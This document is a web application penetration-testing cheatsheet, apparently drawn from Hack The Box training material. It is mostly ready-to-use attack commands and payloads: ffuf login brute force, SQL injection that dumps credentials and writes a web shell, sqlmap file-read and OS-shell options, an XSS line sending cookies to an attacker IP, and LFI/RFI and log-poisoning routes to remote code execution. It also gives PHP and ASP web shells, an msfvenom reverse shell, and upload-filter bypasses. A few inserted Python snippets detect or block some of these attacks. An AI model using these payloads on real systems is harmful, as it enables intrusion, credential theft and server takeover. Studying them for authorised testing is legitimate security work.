Web Application Cheatsheet


Web application penetration testing is a critical security practice designed to identify and exploit vulnerabilities in web applications, simulating real-world attacks to assess their resilience against cyber threats. This method involves a thorough examination of the application’s architecture, from the user interface to the underlying codebase, to uncover potential security gaps that could be exploited by malicious actors. By mimicking the tactics, techniques, and procedures (TTPs) used by hackers, penetration testers provide actionable insights into an application’s security posture, helping organizations strengthen their defenses and comply with industry standards like PCI-DSS. This proactive approach not only enhances security but also reduces the risk of data breaches and financial losses, ensuring that sensitive data remains protected.

Checklist:

For cloud pentesting, see the Pacu tool.

Enumeration

With a raw HTTP request saved from Burp Repeater:

POST /login.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=admin&password=FUZZ

Save it as req.txt and run the login brute force:

ffuf -request req.txt -w /path/to/passwords.txt

To fuzz multiple parameters in the request, you can use multiple FUZZ keywords and specify the corresponding wordlists with the -w option. For example, if you want to fuzz both the username and password parameters, you can use the following command:

ffuf -request req.txt -w usernames.txt:UFUZZ -w passwords.txt:PFUZZ -fs 4242

This will use the usernames.txt wordlist for the UFUZZ keyword and the passwords.txt wordlist for the PFUZZ keyword.

How to filter results:

-mc 200        match responses with HTTP status 200
-fs 4242       filter out responses with content size 4242
-fr "invalid"  filter out responses matching the regex "invalid"
-r             follow redirects (default: false)

Route requests through Burp listening on 8080 (the -x option sets the proxy):

ffuf.exe -request .\req.txt -w .\directories.txt -x http://127.0.0.1:8080

Different attack modes (as in Burp Intruder):

ffuf.exe -request .\req.txt -request-proto http -w bytes.txt:BFUZZ -w passwords.txt:PFUZZ -mode pitchfork

Multi-wordlist operation mode (-mode). Available modes: clusterbomb, pitchfork, sniper (default: clusterbomb)
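The server-side view of the login brute force above is a burst of POSTs to the login path from one source, nearly all with the same status and size (the failure response the attacker hides with -fs/-mc), plus the rare different response that is the hit. The following is an added example, not part of the original cheatsheet: it parses constructed Apache combined-format log lines and flags that pattern; the login path, threshold and window are assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# One Apache combined-format line: client ip, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec

def find_login_bruteforce(lines, login_path="/login.php", threshold=20, window_s=60):
    """Flag sources that POST to login_path >= threshold times within window_s seconds; report the
    dominant (status, size) pair (what the attacker hides with -fs/-mc) and the responses that deviate."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?", 1)[0] == login_path:
            per_ip[rec["ip"]].append(rec)
    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):  # sliding window over the sorted timestamps
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                sigs = Counter((r["status"], r["size"]) for r in recs)
                baseline = sigs.most_common(1)[0][0]
                alerts[ip] = {"attempts": len(recs), "baseline": baseline,
                              "deviations": [s for s in sigs.elements() if s != baseline]}
                break
    return alerts

def constructed_log():
    """Constructed sample: 25 failures and one 302 from 10.0.0.5, two normal logins from 192.0.2.9."""
    fmt = '{ip} - - [10/Mar/2024:12:00:{sec:02d} +0000] "POST /login.php HTTP/1.1" {status} {size} "-" "Mozilla/5.0"'
    lines = [fmt.format(ip="10.0.0.5", sec=i, status=200, size=4242) for i in range(25)]
    lines.append(fmt.format(ip="10.0.0.5", sec=26, status=302, size=0))
    return lines + [fmt.format(ip="192.0.2.9", sec=s, status=200, size=4242) for s in (30, 45)]
```

Because the request file above carries its own User-Agent, the tool's default User-Agent is not a usable signal here; volume and response uniformity are.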

Ffuf

Command Description
ffuf -h ffuf help
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx VHost Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx Parameter Fuzzing - GET
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx Parameter Fuzzing - POST
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx Value Fuzzing
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS Crawl with: folders found in a previous scan (dirlisting alias), a CeWL wordlist (generatelist alias), and a raft-* list or a known extension for EXTENSIONS

Wordlists

Command Description
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt Directory/Page Wordlist
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt Extensions Wordlist
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
/opt/useful/SecLists/Discovery/DNS/namelist.txt Domain Wordlist
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt Parameters Wordlist
/opt/share/seclists/Discovery/Web-Content/raft-* folders, words, extensions

Misc

Command Description
sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts' Add /etc/hosts entry
for i in $(seq 1 1000); do echo $i >> ids.txt; done Create Sequence Wordlist
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded' curl w/ POST

HTTP

HTTP Verb Tampering

HTTP Method

Command Description
-X OPTIONS Set HTTP Method with Curl

IDOR

Identify IDORs

Command Description
md5sum MD5 hash a string
base64 Base64 encode a string

XXE

Code Description
Define External Entity to a URL
Define External Entity to a file path
Read PHP source code with base64 encode filter
Reading a file through a PHP error
Reading a file OOB exfiltration
&xxe; Reference External Entity

SQLi

MySQL

Command Description
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p login to mysql database
SHOW DATABASES List available databases
USE users Switch to database
Tables
CREATE TABLE logins (id INT, …) Add a new table
SHOW TABLES List available tables in current database
DESCRIBE logins Show table properties and columns
INSERT INTO table_name VALUES (value_1,..) Add values to table
INSERT INTO table_name(column2, …) VALUES (column2_value, ..) Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, … WHERE Update table values
Columns
SELECT * FROM table_name Show all columns in a table
SELECT column1, column2 FROM table_name Show specific columns in a table
DROP TABLE logins Delete a table
ALTER TABLE logins ADD newColumn INT Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn Rename column
ALTER TABLE logins MODIFY oldColumn DATE Change column datatype
ALTER TABLE logins DROP oldColumn Delete column
Output
SELECT * FROM logins ORDER BY column_1 Sort by column
SELECT * FROM logins ORDER BY column_1 DESC Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC Sort by two-columns
SELECT * FROM logins LIMIT 2 Only show first two results
SELECT * FROM logins LIMIT 1, 2 Only show first two results starting from index 2
SELECT * FROM table_name WHERE List results that meet a condition
SELECT * FROM logins WHERE username LIKE 'admin%' List results where the name is similar to a given string

MySQL Operator Precedence

SQL Injection

Payload Description
Auth Bypass
admin' or '1'='1 Basic Auth Bypass
admin')-- - Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
' order by 1-- - Detect number of columns using order by
cn' UNION select 1,2,3-- - Detect number of columns using Union injection
cn' UNION select 1,@@version,3,4-- - Basic Union injection
UNION select username, 2, 3, 4 from passwords-- - Union injection for 4 columns
DB Enumeration
SELECT @@version Fingerprint MySQL with query output
SELECT SLEEP(5) Fingerprint MySQL with no output
cn' UNION select 1,database(),2,3-- - Current database name
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- - List all databases
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- - List all tables in a specific database
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- - List all columns in a specific table
cn' UNION select 1, username, password, 4 from dev.credentials-- - Dump data from a table in another database
Privileges
cn' UNION SELECT 1, user(), 3, 4-- - Find current user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- - Find if user has admin privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- - Find all user privileges
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- - Find which directories can be accessed through MySQL
File Injection
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - Read local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt' Write a string to a local file
cn' union select "",'', "", "" into outfile '/var/www/html/shell.php'-- - Write a web shell into the base web directory

SQLMAP

Command Description
sqlmap -h View the basic help menu
sqlmap -hh View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' POST request specifying an injection point with an asterisk
sqlmap -r req.txt Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c' Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5 Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token" Anti-CSRF token bypass
sqlmap --list-tampers List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell Spawning an OS shell

XSS

Code Description
XSS Payloads
alert(window.origin) Basic XSS Payload
Basic XSS Payload
print() Basic XSS Payload
HTML-based XSS Payload
document.body.style.background = "#141d2b" Change Background Color
document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg" Change Background Image
document.title = 'HackTheBox Academy' Change Website Title
document.getElementsByTagName('body')[0].innerHTML = 'text' Overwrite website's main body
document.getElementById('urlform').remove(); Remove certain HTML element
Load remote script
new Image().src='http://OUR_IP/index.php?c='+document.cookie Send Cookie details to us
Commands
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" Run xsstrike on a url parameter
sudo nc -lvnp 80 Start netcat listener
sudo php -S 0.0.0.0:80 Start PHP server

Path traversal

Local File Inclusion

Command Description
Basic LFI
/index.php?language=/etc/passwd Basic LFI
/index.php?language=../../../../etc/passwd LFI with path traversal
/index.php?language=/../../../etc/passwd LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd LFI with approved path
LFI Bypasses
/index.php?language=....//....//....//....//etc/passwd Bypass basic path traversal filter
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 Bypass filters with URL encoding
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] Bypass appended extension with path truncation (obsolete)
/index.php?language=../../../../etc/passwd%00 Bypass appended extension with null byte (obsolete)
/index.php?language=php://filter/read=convert.base64-encode/resource=config Read PHP with base64 filter
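Each bypass row above defeats a filter that looks for the literal "../" string; the robust check instead canonicalizes the final path and confirms it stays inside the intended directory. Added example, not from the original cheatsheet, assuming a hypothetical languages directory under /var/www/html; it runs the page's payloads through both a naive strip-once filter and the canonicalizing check.

```python
import os
from urllib.parse import unquote

# Hypothetical directory the ?language= parameter is allowed to pick files from.
LANG_DIR = os.path.realpath("/var/www/html/languages")

def naive_filter(user_path):
    """The kind of check the 'LFI Bypasses' rows defeat: delete '../' once and trust the result."""
    return user_path.replace("../", "")

def resolve_language_file(user_path, base=LANG_DIR):
    """Return the canonical path if it stays inside base, otherwise None.
    Decode once (as the web server does), refuse NUL bytes, canonicalize with realpath,
    then check the prefix: how '../' was obfuscated no longer matters, only where the path lands."""
    decoded = unquote(user_path)
    if "\x00" in decoded:
        return None  # the %00 extension-truncation trick
    # os.path.join discards base when the user path is absolute; the prefix check catches that.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if not candidate.startswith(base + os.sep):
        return None
    return candidate

if __name__ == "__main__":
    payloads = [
        "en.php",
        "/etc/passwd",
        "../../../../etc/passwd",
        "./languages/../../../../etc/passwd",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64",
        "../../../../etc/passwd%00",
        "....//....//....//....//etc/passwd",
    ]
    for p in payloads:
        print(f"{p:50} naive -> {naive_filter(p):30} safe -> {resolve_language_file(p)}")
```

Note that "....//" is not traversal by itself; it only becomes "../" after the naive filter rewrites it, which is why the canonicalizing check rejects the filtered form and treats the raw form as a harmless nonexistent name inside the directory.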

Remote Code Execution

Command Description
PHP Wrappers
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id RCE with data wrapper
curl -s -X POST --data '' "http://<SERVER_IP>:/index.php?language=php://input&cmd=id" RCE with input wrapper
curl -s "http://<SERVER_IP>:/index.php?language=expect://id" RCE with expect wrapper
RFI
echo '' > shell.php && python3 -m http.server <LISTENING_PORT> Host web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id Include remote PHP web shell
LFI + Upload
echo 'GIF8' > shell.gif Create malicious image
/index.php?language=./profile_images/shell.gif&cmd=id RCE with malicious uploaded image
echo '' > shell.php && zip shell.jpg shell.php Create malicious zip archive 'as jpg'
/index.php?language=zip://shell.zip%23shell.php&cmd=id RCE with malicious uploaded zip
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg Create malicious phar 'as jpg'
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id RCE with malicious uploaded phar
Log Poisoning
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd Read PHP session parameters
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E Poison PHP session with web shell
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id RCE through poisoned PHP session
curl -s "http://<SERVER_IP>:/index.php" -A '' Poison server log
/index.php?language=/var/log/apache2/access.log&cmd=id RCE through poisoned server log

Misc

Command Description
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:/index.php?FUZZ=value' -fs 2287 Fuzz page parameters
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:/index.php?language=FUZZ' -fs 2287 Fuzz LFI payloads
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:/index.php?language=../../../../FUZZ/index.php' -fs 2287 Fuzz webroot path
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:/index.php?language=../../../../FUZZ' -fs 2287 Fuzz server configurations
LFI Wordlists
LFI-Jhaddix.txt

File Inclusion Functions

Function Read Content Execute Remote URL
PHP
include()/include_once()
require()/require_once()
file_get_contents()
fopen()/file()
NodeJS
fs.readFile()
fs.sendFile()
res.render()
Java
include
import
.NET
@Html.Partial()
@Html.RemotePartial()
Response.WriteFile()
include

File Upload

Web Shells

Web Shell Description
<?php file_get_contents('/etc/passwd'); ?> Basic PHP File Read
<?php system('hostname'); ?> Basic PHP Command Execution
<?php system($_REQUEST['cmd']); ?> Basic PHP Web Shell
<% eval request('cmd') %> Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Generate PHP reverse shell
PHP Web Shell PHP Web Shell
PHP Reverse Shell PHP Reverse Shell
Web/Reverse Shells List of Web Shells and Reverse Shells

Bypasses

Command Description
Client-Side Bypass
[CTRL+SHIFT+C] Toggle Page Inspector
Blacklist Bypass
shell.phtml Uncommon Extension
shell.pHp Case Manipulation
PHP Extensions List of PHP Extensions
ASP Extensions List of ASP Extensions
Web Extensions List of Web Extensions
Whitelist Bypass
shell.jpg.php Double Extension
shell.php.jpg Reverse Double Extension
%20, %0a, %00, %0d0a, /, ., ., … Character Injection - Before/After Extension
Content/Type Bypass
Web Content-Types List of Web Content-Types
Content-Types List of All Content-Types
File Signatures List of File Signatures/Magic Bytes
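The blacklist, whitelist and Content-Type rows above all describe ways a name- or header-based check is fooled. What follows is an added example, not from the original cheatsheet, of an upload validator that decides only on the final extension and the file's own leading bytes; the allowed image types and the server-side naming scheme are assumptions.

```python
import os
import secrets

# Assumed upload policy for this example: images only, identified by their magic bytes.
ALLOWED_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

def validate_upload(filename, data):
    """Return (True, server-side name) or (False, reason).
    The client's Content-Type header is deliberately not an input: it is attacker-controlled.
    Only the final extension and the file's own leading bytes decide."""
    # %00, %0a, %0d%0a and path separators from the 'Character Injection' row
    if "\x00" in filename or any(c in filename for c in "\r\n/\\"):
        return False, "control or path character in filename"
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    # 'shell.pHp' -> 'php', 'shell.jpg.php' -> 'php', 'shell.phtml' -> 'phtml': all rejected here;
    # 'shell.php.jpg' -> 'jpg' survives this step and must pass the magic-byte check next
    if ext not in ALLOWED_MAGIC:
        return False, f"extension '{ext}' not allowed"
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match extension"
    # Store under a random server-generated name so the original name never touches the filesystem.
    return True, f"{secrets.token_hex(8)}.{ext}"
```

A magic-byte check rejects mislabeled files but not a polyglot (a valid GIF header followed by PHP, as in the LFI + Upload rows), so the upload directory must also be served without script execution and never be reachable through an include.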

Limited Uploads

Potential Attack File Types
XSS HTML, JS, SVG, GIF
XXE/SSRF XML, SVG, PDF, PPT, DOC
DoS ZIP, JPG, PNG